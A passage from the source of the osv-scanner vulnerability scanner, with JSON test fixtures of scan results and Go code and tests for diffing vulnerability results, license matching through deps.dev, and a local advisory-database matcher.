advisory.\n\n[1]: https://www.rust-lang.org/policies/security", "affected": [ { "package": { "ecosystem": "crates.io", "name": "regex", "purl": "pkg:cargo/regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "1.5.5" } ] } ], "database_specific": { "categories": [ "denial-of-service" ], "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2022-0013.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": 
"PACKAGE", "url": "https://crates.io/crates/regex" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0013.html" }, { "type": "WEB", "url": "https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw" } ] } ], "groups": [ { "ids": [ "GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013" ] } ] } ] } ] } ================================================ FILE: internal/ci/testdata/vulns/test-vuln-results-c.json ================================================ { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": "2023-06-12T18:45:41Z", "published": "2021-04-14T20:04:52Z", "schema_version": "1.4.0", "id": "GO-2021-0053", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "Panic due to improper input validation in github.com/gogo/protobuf", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm" ] } ] } ] } ] } ================================================ FILE: internal/ci/testdata/vulns/test-vuln-results-d.json ================================================ { "results": [ { "source": { "path": "/path/to/scorecard-check-osv-e2e/go.mod", "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/brandnew/package", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/ci/testmain_test.go ================================================ package ci_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/ci/utility.go ================================================ // Package ci provides utility functions for CI integration. 
package ci

import (
	"encoding/json"
	"fmt"
	"os"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// LoadVulnResults opens the file at path and decodes its JSON content into a
// models.VulnerabilityResults.
//
// On either failure (open or decode) it returns a zero-value result and an
// error whose message names only the path. The underlying os or decoder error
// is neither included in the message nor wrapped, so a caller cannot tell a
// missing file from a permission problem or malformed JSON.
//
// A single Decode call is made, so only the first JSON value in the file is
// read; anything after it is not inspected.
func LoadVulnResults(path string) (models.VulnerabilityResults, error) {
	file, err := os.Open(path)
	if err != nil {
		// err is dropped here; only the path reaches the caller
		return models.VulnerabilityResults{}, fmt.Errorf("failed to load '%s'", path)
	}
	defer file.Close()

	var value models.VulnerabilityResults
	err = json.NewDecoder(file).Decode(&value)
	if err != nil {
		// the partially filled value is discarded in favour of a zero value
		return models.VulnerabilityResults{}, fmt.Errorf("failed to parse '%s'", path)
	}

	return value, nil
}

================================================
FILE: internal/ci/utility_test.go
================================================
package ci_test

import (
	"testing"
	"time"

	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scanner/v2/internal/ci"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"google.golang.org/protobuf/testing/protocmp"
	"google.golang.org/protobuf/types/known/structpb"
	"google.golang.org/protobuf/types/known/timestamppb"
)

// parseTime parses str as an RFC 3339 timestamp for use in expected values.
// It panics (rather than failing t) when str is malformed.
func parseTime(t *testing.T, str string) time.Time {
	t.Helper()
	ti, err := time.Parse(time.RFC3339, str)

	if err != nil {
		panic(err)
	}

	return ti
}

func TestLoadVulnResults(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name    string
		path    string
		want    models.VulnerabilityResults
		wantErr bool
	}{
		{
			name:    "does_not_exist",
			path:    "./testdata/does_not_exist",
			want:    models.VulnerabilityResults{},
			wantErr: true,
		},
		{
			name:    "invalid_json",
			path:    "./testdata/not-json.txt",
			want:    models.VulnerabilityResults{},
			wantErr: true,
		},
		{
			name: "results_empty",
			path: "./testdata/results-empty.json",
			want: models.VulnerabilityResults{
				Results: []models.PackageSource{},
				ExperimentalAnalysisConfig: models.ExperimentalAnalysisConfig{
					Licenses: models.ExperimentalLicenseConfig{
						Summary:   true,
						Allowlist: []models.License{"MIT"},
					},
				},
				ImageMetadata:  nil,
				LicenseSummary: nil,
			},
			wantErr: false,
		},
		{
			name: "results_some",
			path: "./testdata/results-some.json",
			want: models.VulnerabilityResults{
				Results:
[]models.PackageSource{ { Source: models.SourceInfo{ Path: "/path/to/different-dir/go.mod", Type: "lockfile", }, ExperimentalPES: nil, Packages: []models.PackageVulns{ { Package: models.PackageInfo{ Name: "github.com/gogo/protobuf", Version: "1.3.1", Ecosystem: "Go", }, Vulnerabilities: []*osvschema.Vulnerability{ { SchemaVersion: "1.4.0", Id: "GO-2021-0053", Modified: timestamppb.New(parseTime(t, "2023-06-12T18:45:41Z")), Published: timestamppb.New(parseTime(t, "2021-04-14T20:04:52Z")), Aliases: []string{"CVE-2021-3121", "GHSA-c3h9-896r-86jm"}, Summary: "Panic due to improper input validation in github.com/gogo/protobuf", Details: "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", Affected: []*osvschema.Affected{ { Package: &osvschema.Package{ Ecosystem: "Go", Name: "github.com/gogo/protobuf", Purl: "pkg:golang/github.com/gogo/protobuf", }, Ranges: []*osvschema.Range{{ Type: osvschema.Range_SEMVER, Events: []*osvschema.Event{ {Introduced: "0"}, {Fixed: "1.3.2"}, }, }}, DatabaseSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "source": { Kind: &structpb.Value_StringValue{ StringValue: "https://vuln.go.dev/ID/GO-2021-0053.json", }, }, }, }, EcosystemSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "imports": { Kind: &structpb.Value_ListValue{ ListValue: &structpb.ListValue{ Values: []*structpb.Value{ { Kind: &structpb.Value_StructValue{ StructValue: &structpb.Struct{ Fields: map[string]*structpb.Value{ "path": { Kind: &structpb.Value_StringValue{ StringValue: "github.com/gogo/protobuf/plugin/unmarshal", }, }, "symbols": { Kind: &structpb.Value_ListValue{ ListValue: &structpb.ListValue{ Values: []*structpb.Value{ { Kind: &structpb.Value_StringValue{ StringValue: "unmarshal.Generate", }, }, { Kind: &structpb.Value_StringValue{ StringValue: "unmarshal.field", }, }, }, }, }, 
}, }, }, }, }, }, }, }, }, }, }, }, }, References: []*osvschema.Reference{ {Type: osvschema.Reference_FIX, Url: "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc"}, }, DatabaseSpecific: &structpb.Struct{ Fields: map[string]*structpb.Value{ "url": { Kind: &structpb.Value_StringValue{ StringValue: "https://pkg.go.dev/vuln/GO-2021-0053", }, }, }, }, }, }, Groups: []models.GroupInfo{{IDs: []string{"GO-2021-0053"}}}, Licenses: nil, LicenseViolations: nil, }, }, }, }, ExperimentalAnalysisConfig: models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{ Summary: true, }, }, ImageMetadata: nil, LicenseSummary: nil, }, wantErr: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := ci.LoadVulnResults(tt.path) if (err != nil) != tt.wantErr { t.Errorf("LoadVulnResults() error = %v, wantErr %v", err, tt.wantErr) return } if diff := cmp.Diff(tt.want, got, protocmp.Transform()); diff != "" { t.Errorf("LoadVulnResults() returned unexpected result (-want +got):\n%s", diff) } }) } } ================================================ FILE: internal/ci/vulnerability_result_diff.go ================================================ package ci import ( "github.com/google/osv-scanner/v2/internal/grouper" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) // DiffVulnerabilityResults will return any new vulnerabilities that are in `newRes` // which is not present in `oldRes`, but not the reverse. 
//
// Matching is exact at every level: a source counts as already known only when
// its models.SourceInfo equals one in oldRes, a package only when its
// models.PackageInfo equals one under that same source, and a vulnerability
// only when its ID (GetId) was recorded for that same package. Aliases are not
// consulted. A moved lockfile or a changed package version therefore yields a
// key oldRes does not contain, and everything beneath it is reported as new.
//
// Only Results is populated on the returned value; the remaining fields of
// models.VulnerabilityResults keep their zero values. For a package that also
// existed in oldRes, only Package, Vulnerabilities and Groups are set on the
// returned entry.
func DiffVulnerabilityResults(oldRes, newRes models.VulnerabilityResults) models.VulnerabilityResults {
	result := models.VulnerabilityResults{}
	// Initialize caches for quick lookup
	sourceToIndex, packageToIndex, vulnToIndex := initializeCaches(oldRes)

	for _, ps := range newRes.Results {
		sourceIdx, sourceExists := sourceToIndex[ps.Source]
		if !sourceExists {
			// Newly introduced source, so all results for this source are going to be new, add everything for this source
			result.Results = append(result.Results, ps)
			continue
		}

		// Otherwise the old source used to exist, so we need to find the difference in the packages
		result.Results = append(result.Results, models.PackageSource{
			Source: ps.Source,
		})
		// Points at the entry just appended; result.Results is not appended to
		// again before the next iteration of the outer loop.
		resultPS := &result.Results[len(result.Results)-1]

		for _, pv := range ps.Packages {
			// packageToIndex[sourceIdx] is nil when the old source had no packages;
			// indexing a nil map reports "not present", so the package is treated as new.
			pkgIdx, packageExists := packageToIndex[sourceIdx][pv.Package]
			if !packageExists {
				// Newly introduced package, so all results for this package are going to be new, add everything for this package
				resultPS.Packages = append(resultPS.Packages, pv)
				continue
			}

			// Otherwise the old package used to exist, so we need to find the difference in the vulnerabilities
			// Only copy over packages as vulns and groups might change
			resultPS.Packages = append(resultPS.Packages, models.PackageVulns{
				Package: pv.Package,
			})
			// Same pattern as resultPS: valid until resultPS.Packages is appended to again.
			resultPV := &resultPS.Packages[len(resultPS.Packages)-1]

			for _, v := range pv.Vulnerabilities {
				if !vulnToIndex[sourceIdx][pkgIdx][v.GetId()] {
					// Vulnerability is new, add it to the results
					resultPV.Vulnerabilities = append(resultPV.Vulnerabilities, v)
					continue
				}
			}

			if len(resultPV.Vulnerabilities) == 0 {
				// No vulns, so we can remove the PackageVulns entry entirely, and skip grouping
				resultPS.Packages = resultPS.Packages[:len(resultPS.Packages)-1]
				continue
			}

			// Rebuild the groups lost in the previous step
			groups := grouper.Group(grouper.ConvertVulnerabilityToIDAliases(resultPV.Vulnerabilities))
			for i, group := range groups {
				// severity is computed over the reduced vulnerability list, not the original package entry
				groups[i].MaxSeverity = output.MaxSeverity(group, *resultPV)
			}
			resultPV.Groups = groups
		}

		if len(resultPS.Packages) == 0 {
			// No packages, so we can remove the PackageSource entry entirely
			result.Results = result.Results[:len(result.Results)-1]
			continue
		}
	}

	return result
}

// initializeCaches sets up maps for quick lookup of sources, packages, and vulnerabilities by their indices.
//
// It returns, in order:
//   - a map from models.SourceInfo to the source's position in oldRes.Results
//   - per source, a map from models.PackageInfo to the package's position in that source
//   - per source and package, the set of vulnerability IDs recorded for that package
//
// If the same SourceInfo (or the same PackageInfo within a source) appears more
// than once, the later position overwrites the earlier one in the lookup map.
func initializeCaches(oldRes models.VulnerabilityResults) (map[models.SourceInfo]int, []map[models.PackageInfo]int, [][]map[string]bool) {
	sourceToIndex := make(map[models.SourceInfo]int, len(oldRes.Results))
	// The index in the array corresponds to a source index, a query would look like packageToIndex[sourceIndex][packageInfo]
	packageToIndex := make([]map[models.PackageInfo]int, len(oldRes.Results))
	// The first index in the array corresponds to a source index, and the second index corresponds to a package index
	// a query would look like vulnToIndex[sourceIndex][packageIndex][vulnID]
	vulnToIndex := make([][]map[string]bool, len(oldRes.Results))

	// Populate index maps for sources, packages, and vulnerabilities
	for sourceIndex, vulnResult := range oldRes.Results {
		sourceToIndex[oldRes.Results[sourceIndex].Source] = sourceIndex
		if vulnToIndex[sourceIndex] == nil {
			vulnToIndex[sourceIndex] = make([]map[string]bool, len(vulnResult.Packages))
		}
		for packageIndex, pkg := range vulnResult.Packages {
			// allocated lazily, so a source without packages keeps a nil map here
			if packageToIndex[sourceIndex] == nil {
				packageToIndex[sourceIndex] = make(map[models.PackageInfo]int, len(vulnResult.Packages))
			}
			packageToIndex[sourceIndex][pkg.Package] = packageIndex

			if vulnToIndex[sourceIndex][packageIndex] == nil {
				vulnToIndex[sourceIndex][packageIndex] = make(map[string]bool, len(pkg.Vulnerabilities))
			}
			for _, vuln := range pkg.Vulnerabilities {
				vulnToIndex[sourceIndex][packageIndex][vuln.GetId()] = true // Mark the vulnerability as present
			}
		}
	}

	return sourceToIndex, packageToIndex, vulnToIndex
}

// DiffVulnerabilityResultsByOccurrences will return the occurrence of each vulnerability that are in `newRes`
// which is not present in
// `oldRes`, but not the reverse. This calculates the difference by vulnerability ID,
// while ignoring the source of the vulnerability.
//
// This prevents us reporting "new" vulnerabilities in a PR when a previously vulnerable file is being moved.
//
// The returned map is keyed by vulnerability ID and keeps only the IDs that
// have more entries in newRes.Flatten() than in oldRes.Flatten(). The value is
// the total number of entries for that ID in newRes, not the increase over
// oldRes.
//
// Because entries are counted per ID across the whole result, an ID that
// disappears from one package or source and appears in another within the same
// change leaves the count unchanged and is not reported.
func DiffVulnerabilityResultsByOccurrences(oldRes, newRes models.VulnerabilityResults) map[string]int {
	oldResFlat := oldRes.Flatten()
	newResFlat := newRes.Flatten()

	oldResMap := map[string]int{}
	newResMap := map[string]int{}

	// Count entries per vulnerability ID on each side
	for _, vf := range oldResFlat {
		oldResMap[vf.Vulnerability.GetId()] += 1
	}

	for _, vf := range newResFlat {
		newResMap[vf.Vulnerability.GetId()] += 1
	}

	for k, oldVulnCount := range oldResMap {
		// If the new result does not have more occurrences of this ID than the old result
		// (fewer or the same number), remove the entry from the new result.
		// `map`'s default value is 0 when empty, and delete also works fine when the entry is empty
		if newResMap[k] <= oldVulnCount {
			delete(newResMap, k)
		}
	}

	return newResMap
}

================================================
FILE: internal/ci/vulnerability_result_diff_test.go
================================================
package ci_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/ci"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/pkg/models"
)

func TestDiffVulnerabilityResults(t *testing.T) {
	t.Parallel()

	type args struct {
		oldRes models.VulnerabilityResults
		newRes models.VulnerabilityResults
	}
	tests := []struct {
		name string
		args args
	}{
		{
			// diff should be empty since the old and new results are the same
			name: "same_everything",
			args: args{
				oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"),
				newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"),
			},
		},
		{
			// diff should have the moved package only
			name: "same_packages_but_with_one_moved",
			args: args{
				oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t,
"testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a-1.json"), }, }, { // diff should have just the new vuln name: "same_packages_with_new_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should be empty name: "new_has_one_less_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, { // diff should have all the new vulns name: "new_vuln_and_packages", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-c.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should have no vulns name: "old_vuln_and_packages_gone", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-c.json"), }, }, { // diff should be empty since new package does not have any vulns name: "old_package_replaced_with_new_package", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-d.json"), }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ci.DiffVulnerabilityResults(tt.args.oldRes, tt.args.newRes) testutility.NewSnapshot().MatchJSON(t, got) }) } } func 
TestDiffVulnerabilityByUniqueVulnCountResults(t *testing.T) { t.Parallel() type args struct { oldRes models.VulnerabilityResults newRes models.VulnerabilityResults } tests := []struct { name string args args }{ { // diff should be empty name: "same_packages_with_different_source_path", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a-1.json"), }, }, { // diff should be empty name: "same_everything", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, { // diff should have just the new vuln name: "same_package_with_new_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), }, }, { // diff should be empty name: "new_has_one_less_vuln", args: args{ oldRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-b.json"), newRes: testutility.LoadJSONFixture[models.VulnerabilityResults](t, "testdata/vulns/test-vuln-results-a.json"), }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ci.DiffVulnerabilityResultsByOccurrences(tt.args.oldRes, tt.args.newRes) testutility.NewSnapshot().MatchJSON(t, got) }) } } ================================================ FILE: internal/clients/clientimpl/licensematcher/licensematcher.go ================================================ // Package licensematcher implements a client for matching licenses using the deps.dev API. 
package licensematcher

import (
	"context"

	depsdevpb "deps.dev/api/v3"
	"github.com/google/osv-scalibr/clients/datasource"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/depsdev"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/google/osv-scanner/v2/pkg/models"
	"golang.org/x/sync/errgroup"
	"google.golang.org/grpc/codes"
	"google.golang.org/grpc/status"
)

// maxConcurrentRequests is the limit handed to the errgroup that issues the
// GetVersion calls.
const (
	maxConcurrentRequests = 1000
)

// DepsDevLicenseMatcher implements the LicenseMatcher interface with a deps.dev client.
// It sends out requests for every package version and does not perform caching.
// NOTE(review): Client is a *datasource.CachedInsightsClient; whether that type
// caches responses itself is not visible here - confirm the "no caching" claim.
type DepsDevLicenseMatcher struct {
	Client *datasource.CachedInsightsClient
}

// MatchLicenses fills in the Licenses field of every entry in packages.
//
// A GetVersion query is built for each package whose ecosystem has an entry in
// depsdev.System and whose name and version are both non-empty, so the names
// and versions of those packages (internal ones included) are passed to the
// client. Packages that do not qualify keep a nil query slot, which
// makeVersionRequest answers with "UNKNOWN" without making a request.
//
// If makeVersionRequest fails, the error is returned and no package is
// modified.
func (matcher *DepsDevLicenseMatcher) MatchLicenses(ctx context.Context, packages []*extractor.Package) error {
	// One slot per package, in the same order, so results can be mapped back by index.
	requests := make([]*depsdevpb.GetVersionRequest, len(packages))
	for idx, p := range packages {
		system, known := depsdev.System[imodels.Ecosystem(p).Ecosystem]
		if known && imodels.Name(p) != "" && imodels.Version(p) != "" {
			requests[idx] = versionQuery(system, imodels.Name(p), imodels.Version(p))
		}
	}

	found, err := matcher.makeVersionRequest(ctx, requests)
	if err != nil {
		return err
	}

	for idx, perPackage := range found {
		asStrings := make([]string, 0, len(perPackage))
		for _, l := range perPackage {
			asStrings = append(asStrings, string(l))
		}
		packages[idx].Licenses = asStrings
	}

	return nil
}

// makeVersionRequest calls the deps.dev GetVersion gRPC API endpoint for each
// query. It makes these requests concurrently, sharing the single HTTP/2
// connection. The order in which the requests are specified should correspond
// to the order of licenses returned by this function.
//
// A nil query, a NotFound response and a response without licenses all produce
// the single license "UNKNOWN", so callers cannot tell those cases apart. Any
// other error is returned from Wait and the function returns a nil slice.
func (matcher *DepsDevLicenseMatcher) makeVersionRequest(ctx context.Context, queries []*depsdevpb.GetVersionRequest) ([][]models.License, error) {
	out := make([][]models.License, len(queries))

	group, ctx := errgroup.WithContext(ctx)
	group.SetLimit(maxConcurrentRequests)

	for i := range queries {
		if queries[i] == nil {
			// This may be a private package.
			out[i] = []models.License{models.License("UNKNOWN")}
			continue
		}

		// Each goroutine writes only out[i], so the slots need no lock.
		// NOTE(review): the closure captures the loop variable i; this is only
		// correct with per-iteration loop variables - confirm the module's Go version.
		group.Go(func() error {
			resp, err := matcher.Client.GetVersion(ctx, queries[i])
			switch {
			case err == nil:
				// fall through to the conversion below
			case status.Code(err) == codes.NotFound:
				out[i] = []models.License{"UNKNOWN"}
				return nil
			default:
				return err
			}

			reported := resp.GetLicenses()
			if len(reported) == 0 {
				// The deps.dev API will return an
				// empty slice if the license is
				// unknown.
				out[i] = []models.License{models.License("UNKNOWN")}
				return nil
			}

			converted := make([]models.License, 0, len(reported))
			for _, l := range reported {
				converted = append(converted, models.License(l))
			}
			out[i] = converted

			return nil
		})
	}

	if waitErr := group.Wait(); waitErr != nil {
		return nil, waitErr
	}

	return out, nil
}

// versionQuery builds the GetVersion request for one package version.
// For the Go system the version is rewritten first: "go" is prepended when the
// package name is "stdlib", "v" otherwise.
func versionQuery(system depsdevpb.System, name string, version string) *depsdevpb.GetVersionRequest {
	if system == depsdevpb.System_GO {
		// deps.dev uses native go versioning, which includes prepending v for package versions
		// and go for stdlib
		prefix := "v"
		if name == "stdlib" {
			prefix = "go"
		}
		version = prefix + version
	}

	key := &depsdevpb.VersionKey{
		System:  system,
		Name:    name,
		Version: version,
	}

	return &depsdevpb.GetVersionRequest{VersionKey: key}
}

================================================
FILE: internal/clients/clientimpl/localmatcher/localmatcher.go
================================================
// Package localmatcher implements a vulnerability matcher
// that uses a local database downloaded from osv.dev's export bucket.
package localmatcher

import (
	"context"
	"errors"
	"fmt"
	"os"
	"path"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/inventory/osvecosystem"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// zippedDBRemoteHost is the base URL the per-ecosystem "all.zip" archives are requested from.
const zippedDBRemoteHost = "https://osv-vulnerabilities.storage.googleapis.com"

// envKeyLocalDBCacheDirectory names the environment variable consulted for the
// database directory when no path is passed explicitly.
const envKeyLocalDBCacheDirectory = "OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY"

// LocalMatcher implements the VulnerabilityMatcher interface by downloading the osv export zip files,
// and performing the matching locally.
type LocalMatcher struct {
	dbBasePath string
	dbs        map[osvconstants.Ecosystem]*ZipDB
	downloadDB bool
	// failedDBs keeps track of the errors when getting databases for each ecosystem
	failedDBs map[osvconstants.Ecosystem]error
	// userAgent sets the user agent requests for db zips are made with
	userAgent string
}

// NewLocalMatcher prepares the database directory and returns a matcher with
// empty database and failure caches. No database is loaded at this point.
//
// NOTE(review): when localDBPath and the environment variable are both empty,
// setupLocalDBDirectory picks the directory itself and may use
// os.TempDir()/osv-scanner if the user cache directory is unavailable.
// os.MkdirAll also succeeds on a directory that already exists, so on
// multi-user hosts prefer an explicit path owned by the scanning user.
func NewLocalMatcher(localDBPath string, userAgent string, downloadDB bool) (*LocalMatcher, error) {
	basePath, setupErr := setupLocalDBDirectory(localDBPath)
	if setupErr != nil {
		return nil, fmt.Errorf("could not create %s: %w", basePath, setupErr)
	}

	m := &LocalMatcher{}
	m.dbBasePath = basePath
	m.dbs = make(map[osvconstants.Ecosystem]*ZipDB)
	m.downloadDB = downloadDB
	m.userAgent = userAgent
	m.failedDBs = make(map[osvconstants.Ecosystem]error)

	return m, nil
}

// MatchVulnerabilities returns, for each entry of pkgs and in the same order,
// the advisories from the local database that affect it.
//
// An empty list is returned for a package in three different situations: no
// advisory matched, the package is identified by commit only (no ecosystem and
// no version), or the database for its ecosystem could not be loaded. In the
// last case the failure is only logged by the loader, so the result reads the
// same as "no known vulnerabilities"; callers that gate on the output should
// also watch the logged errors.
//
// It returns an error when a previously loaded database is partial, when ctx is
// done, or when a package has neither an ecosystem nor a commit.
func (matcher *LocalMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) {
	matched := make([][]*osvschema.Vulnerability, 0, len(pkgs))

	// ensure all databases loaded so far have been fully loaded; this is just a
	// basic safeguard since we don't actually currently attempt to reuse matchers
	// across scans, and its possible we never will, so we don't need to be smart
	for _, loaded := range matcher.dbs {
		if loaded.Partial {
			return nil, errors.New("local matcher cannot be (re)used with a partially loaded database")
		}
	}

	for _, pkg := range pkgs {
		if ctxErr := ctx.Err(); ctxErr != nil {
			return nil, ctxErr
		}

		parsed := imodels.Ecosystem(pkg)
		eco := parsed.Ecosystem

		if parsed.IsEmpty() {
			switch {
			case imodels.Commit(pkg) == "":
				// This should never happen, as those results will be filtered out before matching
				return nil, errors.New("ecosystem is empty and there is no commit hash")
			case imodels.Version(pkg) == "":
				// matching ecosystem-less versions can only be attempted if we have a version
				// Is a commit based query, skip local scanning
				matched = append(matched, []*osvschema.Vulnerability{})
				// TODO (V2 logging): cmdlogger.Infof("Skipping commit scanning for: %s", imodels.Commit(pkg))
				continue
			}
			eco = "GIT"
		}

		db, loadErr := matcher.loadDBFromCache(ctx, eco, pkgs)
		if loadErr != nil {
			// no logging here as the loader will have already done that
			matched = append(matched, []*osvschema.Vulnerability{})
			continue
		}

		matched = append(matched, VulnerabilitiesAffectingPackage(db.Vulnerabilities, pkg))
	}

	return matched, nil
}

// LoadEcosystem tries to preload the ecosystem into the cache, and returns an error if the ecosystem
// cannot be loaded.
//
// Preloaded databases include every advisory, so can be reused.
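func (matcher *LocalMatcher) LoadEcosystem(ctx context.Context, eco osvecosystem.Parsed) error {
	// passing no packages makes NewZippedDB load every advisory (Partial == false)
	_, err := matcher.loadDBFromCache(ctx, eco.Ecosystem, nil)

	return err
}

// loadDBFromCache returns the database for eco, loading it on first use.
//
// Both successful loads and failures are remembered, so a database that failed
// to load is not retried for the lifetime of the matcher. invs is forwarded to
// NewZippedDB, which loads only advisories that might affect those packages
// when the list is not empty.
//
// NOTE(review): the two maps are read and written without any locking visible
// in LocalMatcher, so this presumably must not be called concurrently.
func (matcher *LocalMatcher) loadDBFromCache(ctx context.Context, eco osvconstants.Ecosystem, invs []*extractor.Package) (*ZipDB, error) {
	if cached, ok := matcher.dbs[eco]; ok {
		return cached, nil
	}

	if prior := matcher.failedDBs[eco]; prior != nil {
		return nil, prior
	}

	// NOTE(review): eco ends up both in the archive URL and, via NewZippedDB,
	// in the cache path; presumably it is always a known ecosystem name rather
	// than free text taken from the scanned input - confirm against callers.
	db, err := NewZippedDB(
		ctx,
		matcher.dbBasePath,
		string(eco),
		fmt.Sprintf("%s/%s/all.zip", zippedDBRemoteHost, eco),
		matcher.userAgent,
		!matcher.downloadDB,
		invs,
	)

	if err != nil {
		matcher.failedDBs[eco] = err
		cmdlogger.Errorf("could not load db for %s ecosystem: %v", eco, err)

		return nil, err
	}

	cmdlogger.Infof("Loaded %s local db from %s", db.Name, db.StoredAt)

	matcher.dbs[eco] = db

	return db, nil
}

// setupLocalDBDirectory attempts to set up the directory the scanner should
// use to store local databases.
//
// if a local path is NOT explicitly provided, either by the localDBPath
// parameter or via the envKeyLocalDBCacheDirectory environment variable, the
// scanner will attempt to use the user cache directory if possible or
// otherwise the temp directory
//
// if an error occurs at any point when a local path is not explicitly provided,
// the scanner will fall back to the temp directory first before finally erroring
//
// NOTE(review): os.MkdirAll reports success when the directory already exists,
// whoever created it and whatever its mode. When the temp directory is used on
// a multi-user host, the "osv-scanner" directory may therefore not be one this
// process created; offline runs read whatever archive is stored there. Hosts
// where that matters should pass an explicit, access-controlled path.
func setupLocalDBDirectory(localDBPath string) (string, error) {
	// fallback to the env variable if a local database path has not been provided
	if localDBPath == "" {
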